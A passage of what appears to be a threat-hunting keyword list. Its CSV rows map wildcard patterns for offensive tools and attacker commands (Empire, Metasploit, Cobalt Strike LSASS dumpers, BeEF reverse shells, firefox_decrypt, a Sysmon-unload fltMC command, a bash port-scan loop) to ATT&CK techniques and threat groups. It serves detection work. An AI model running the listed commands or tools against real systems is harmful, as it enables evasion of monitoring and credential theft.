Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-WMILocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FireBuster.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*fireeye*commando*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*FireFart*dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" +"*firefox/FakeUpdate_files/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*firefox_decrypt.py*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*firefox_decrypt-main*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*firefox_extension_bindshell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*firefox_extension_reverse_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*firefox_privilege_escalation.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*firefox_privilege_escalation_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*firefox_smil_uaf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*FireListener.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Firesheep/*","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Firewall_Walker_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"*fishing_with_hollowing*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" +"*fjoaledfpmneenckfbpdfhkmimnjocfa*","greyware_tool_keyword","NordVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*fkasler/cuddlephish*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*Flangvik/NetLoader*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*Flangvik/SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*flashupdate.ps1*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*florylsk/NtRemoteLoad*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*fltMC* unload SysmonDrv*","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" +"*FluxionNetwork*","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","10","4340","1377","2023-08-30T20:11:16Z","2017-04-29T10:22:27Z" +"*fodhelperbypass*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*fodhelperUACBypass*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*foiopecknacmiihiocgdjgbjokkpkohc*","greyware_tool_keyword","VPN Professional","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Follina.Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*follina.py*muban.docx*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" +"*Follina/follina.html*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Follina/Follinadoc*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*for /f %%i in (C:\Windows\IME\ok.txt)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*for /r c:\windows\system32\ %i in (*sht*.exe)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*for i in {1..65535}*","greyware_tool_keyword","bash port scan","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*-force-forwardableet-ADComputer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*foreign_access.cna*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*foreign_lsass * *","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*foreign_lsass.c*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*foreign_lsass.x64*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*foreign_lsass.x86*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*forge_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built 